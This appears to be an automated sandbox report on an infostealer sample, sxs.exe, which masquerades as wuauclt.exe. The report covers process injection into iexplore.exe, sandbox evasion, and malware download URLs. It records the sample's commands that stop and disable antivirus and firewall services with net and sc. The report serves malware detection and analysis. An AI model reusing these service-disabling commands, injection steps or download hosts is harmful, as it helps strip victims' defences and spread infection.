Source: wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: HTTP://WWW.TW7890.COM/TWV/HELP.EXEHTTP://WWW.OM7890.COM/MFX/HELP.EXEHTTP://WWW.HG7890.COM/HGB/HELP.EXEHTTP://WWW.GAMESRB.COM/RBM/HELP.EXES5CREDMGR.EXE;MINISNIFFER.EXE;PACKETCAPTURE.EXE;PEEPNET.EXE;CAPTURENET.EXE;WIRESHARK.EXE;APS.EXE;SOCKMON5.EXE;GAMETROYHORSEDETECT.EXE;FILEMON.EXE;REGMON.EXE;CAPTURE;SNIFFER;
Source: wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: S5CREDMGR.EXE;MINISNIFFER.EXE;PACKETCAPTURE.EXE;PEEPNET.EXE;CAPTURENET.EXE;WIRESHARK.EXE;APS.EXE;SOCKMON5.EXE;GAMETROYHORSEDETECT.EXE;FILEMON.EXE;REGMON.EXE;
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 480000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 900000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 900000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 480000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 300000
Source: C:\Users\user\Desktop\sxs.exe TID: 5704Thread sleep time: -480000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\sxs.exe TID: 5272Thread sleep time: -900000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\sxs.exe TID: 5528Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\sxs.exe TID: 5304Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\wuauclt.exe TID: 7804Thread sleep time: -900000s >= -30000sJump to behavior
Source: C:\Windows\wuauclt.exe TID: 7808Thread sleep time: -1800000s >= -30000sJump to behavior
Source: C:\Windows\wuauclt.exe TID: 7812Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\wuauclt.exe TID: 9168Thread sleep time: -480000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8288Thread sleep time: -900000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8260Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\wuauclt.exe TID: 8252Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00404C8C
Source: C:\Windows\wuauclt.exeCode function: 4_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,4_2_00404C8C
Source: C:\Windows\wuauclt.exeCode function: 42_2_00404C8C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,42_2_00404C8C
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 480000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 900000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 900000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 1800000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 300000Jump to behavior
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 480000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 900000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 1800000
Source: C:\Windows\wuauclt.exeThread delayed: delay time: 300000
Source: wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000005.00000002.2639171790.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 0000000C.00000002.2676620417.00000000014CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: sxs.exe, 00000000.00000002.2041399746.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV_
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllDq5k
Source: explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:@
Source: C:\Users\user\Desktop\sxs.exeAPI call chain: ExitProcess graph end nodegraph_0-7267
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00439FF4 LdrInitializeThunk,0_2_00439FF4
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Source: C:\Users\user\Desktop\sxs.exeMemory protected: page execute read | page execute and read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\sxs.exeMemory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: 100000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\wuauclt.exeMemory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: D50000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00741BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_3_00741BC1
Source: C:\Windows\wuauclt.exeCode function: 42_3_02311BC1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,VirtualAlloc,CloseHandle,VirtualFree,EnumProcesses,OpenProcess,EnumProcessModules,OpenProcess,CreateProcessA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualFreeEx,CloseHandle,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,WriteProcessMemory,ResumeThread,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,WaitForSingleObject,CreateRemoteThread,SetThreadPriority,WaitForSingleObject,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,CloseHandle,42_3_02311BC1
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 100000 value starts with: 4D5AJump to behavior
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D50000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 100000Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A36Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A3BJump to behavior
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A59Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: 101A59Jump to behavior
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D50000
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A36
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A3B
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A59
Source: C:\Windows\wuauclt.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: D51A59
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"Jump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.comJump to behavior
Source: C:\Users\user\Desktop\sxs.exeProcess created: C:\Windows\wuauclt.exe "C:\Windows\wuauclt.exe" Jump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" http://www.onefordvd.comJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.regJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop sharedaccessJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVWSCJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVWSC start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop KVSrvXPJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config KVSrvXP start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop kavsvcJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config kavsvc start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsRavMon start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsCCenterJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" config RsCCenter start= disabledJump to behavior
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" stop RsRavMonJump to behavior
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop sharedaccess
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVWSC
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop KVSrvXP
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop kavsvc
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsCCenter
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop RsRavMon
Source: C:\Windows\wuauclt.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" http://www.dvdforone.com
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program ManagerhNotificationAreaIconWindowClassut Application
Source: wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program ManagerhNotificationAreaIconWindowClass
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00402728 GetSystemTime,0_2_00402728
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_007418A1 GetVersionExA,0_3_007418A1
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: kavstart.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: CCenter.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: KavPFW.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: Kav.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: kav32.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: Kvsrvxp.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: kavsvc.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: RavMonD.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpBinary or memory string: Rtvscan.exe
Source: C:\Windows\wuauclt.exeCode function: 4_2_0040558C FindWindowA,EnumChildWindows,FindWindowExA,4_2_0040558C
Source: C:\Windows\wuauclt.exeCode function: 42_2_0040558C FindWindowA,EnumChildWindows,FindWindowExA,42_2_0040558C

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure12
Replication Through Removable Media		11
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Service Execution		11
Windows Service		11
Windows Service		1
Deobfuscate/Decode Files or Information		LSASS Memory11
Peripheral Device Discovery		Remote Desktop Protocol1
Email Collection		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt11
Registry Run Keys / Startup Folder		512
Process Injection		3
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		2
Software Packing		NTDS4
System Information Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets211
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
File Deletion		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
Masquerading		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501290 Sample: sxs.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 75 www.dvdforone.com 2->75 77 msg.tmhacker.com 2->77 79 1861119.com 2->79 93 Antivirus detection for URL or domain 2->93 95 Antivirus / Scanner detection for submitted sample 2->95 97 Multi AV Scanner detection for submitted file 2->97 99 Machine Learning detection for sample 2->99 9 sxs.exe 2 16 2->9         started        13 wuauclt.exe 2->13         started        15 explorer.exe 12 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 69 C:\Windows\wuauclt.exe, MS-DOS 9->69 dropped 71 C:\Windows\wuauclt.exe:Zone.Identifier, ASCII 9->71 dropped 73 C:\Windows\noruns.reg, Windows 9->73 dropped 111 Found evasive API chain (may stop execution after checking mutex) 9->111 113 Contains functionality to inject threads in other processes 9->113 115 Drops executables to the windows directory (C:\Windows) and starts them 9->115 123 2 other signatures 9->123 19 wuauclt.exe 13 9->19         started        22 explorer.exe 9->22         started        24 iexplore.exe 9->24         started        117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->117 119 Writes to foreign memory regions 13->119 121 Allocates memory in foreign processes 13->121 26 iexplore.exe 13->26         started        28 explorer.exe 13->28         started        30 chrome.exe 8 15->30         started        33 chrome.exe 17->33         started        35 chrome.exe 17->35         started        signatures6 process7 dnsIp8 101 Antivirus detection for dropped file 19->101 103 Multi AV Scanner detection for dropped file 19->103 105 Machine Learning detection for dropped file 19->105 107 2 other signatures 19->107 37 regedit.exe 19->37         started        40 net.exe 19->40         started        42 net.exe 19->42         started        51 10 other processes 19->51 87 192.168.2.4 unknown unknown 30->87 89 192.168.2.5, 443, 49269, 49378 unknown unknown 30->89 91 239.255.255.250 unknown Reserved 30->91 44 chrome.exe 30->44         started        47 chrome.exe 33->47         started        49 chrome.exe 35->49         started        signatures9 process10 dnsIp11 109 Changes autostart functionality of drives 37->109 53 conhost.exe 40->53         started        55 net1.exe 40->55         started        57 conhost.exe 42->57         started        59 net1.exe 42->59         started        81 www.onefordvd.com 15.197.204.56, 443, 49707, 49708 TANDEMUS United States 44->81 83 142.250.184.193, 443, 53794, 53795 GOOGLEUS United States 44->83 85 16 other IPs or domains 44->85 61 conhost.exe 51->61         started        63 conhost.exe 51->63         started        65 conhost.exe 51->65         started        67 10 other processes 51->67 signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sxs.exe91%ReversingLabsWin32.Infostealer.QqRob
sxs.exe100%AviraTR/Crypt.ZPACK.Gen
sxs.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\wuauclt.exe100%AviraTR/Crypt.ZPACK.Gen
C:\Windows\wuauclt.exe100%Joe Sandbox ML
C:\Windows\wuauclt.exe91%ReversingLabsWin32.Infostealer.QqRob

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://syndicatedsearch.goog0%URL Reputationsafe
https://ad-delivery.net/px.gif?ch=20%URL Reputationsafe
http://www.xxx.com/abc.exe0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txtZin0%Avira URL Cloudsafe
http://1861119.com/ie.txt0%Avira URL Cloudsafe
http://www.dvdforone.com/0M0%Avira URL Cloudsafe
http://1861119.com/1.txt0%Avira URL Cloudsafe
http://1861119.com/ie.txthT;0%Avira URL Cloudsafe
http://www.xxx.com/qqmsg.txt0%Avira URL Cloudsafe
http://1861119.com/index.exe$N0%Avira URL Cloudsafe
http://www.xxx.com/ie.txt0%Avira URL Cloudsafe
http://msg.tmhacker.com/down.txt0%Avira URL Cloudsafe
https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=50%Avira URL Cloudsafe
https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js0%Avira URL Cloudsafe
https://api.aws.parking.godaddy.com/v1/parkingEvents?abp=1&gdabp=true0%Avira URL Cloudsafe
http://1861119.com/index.exeq#0%Avira URL Cloudsafe
http://msg.tmhacker.com/tean1.txt8U0%Avira URL Cloudsafe
http://1861119.com/ie.txt_0%Avira URL Cloudsafe
http://1861119.com/ie.tx0%Avira URL Cloudsafe
https://syndicatedsearch.goog/afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=lhb5r7xl5det&aqid=1Y_QZrGTL9KnjuwPiPe1wA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=4%7C0%7C1541%7C1243%7C284&lle=0&ifv=1&hpt=00%Avira URL Cloudsafe
http://www.onefordvd.comXV0%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.t0%Avira URL Cloudsafe
http://www.dvdforone.com/C:0%Avira URL Cloudsafe
http://1861119.com/index.exe0%Avira URL Cloudsafe
http://www.om7890.com/mfx/help.exe100%Avira URL Cloudmalware
http://www.onefordvd.com/A0%Avira URL Cloudsafe
http://www.onefordvd.com/s.lll0%Avira URL Cloudsafe
https://login.li0%Avira URL Cloudsafe
https://ad-delivery.net/px.gif?ch=1&e=0.73791767311794110%Avira URL Cloudsafe
http://www.dvdforone.com/Zy0%Avira URL Cloudsafe
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x2500%Avira URL Cloudsafe
http://www.onefordvd.comop0%Avira URL Cloudsafe
http://1861119.com/index.exeb10%Avira URL Cloudsafe
http://msg.tmhacker.com/ie.txt0%Avira URL Cloudsafe
https://www.google.com/js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js0%Avira URL Cloudsafe
https://syndicatedsearch.goog/adsense/domains/caf.js?pac=00%Avira URL Cloudsafe
http://www.gamesrb.com/rbm/help.exe0%Avira URL Cloudsafe
http://www.onefordvd.com/)0%Avira URL Cloudsafe
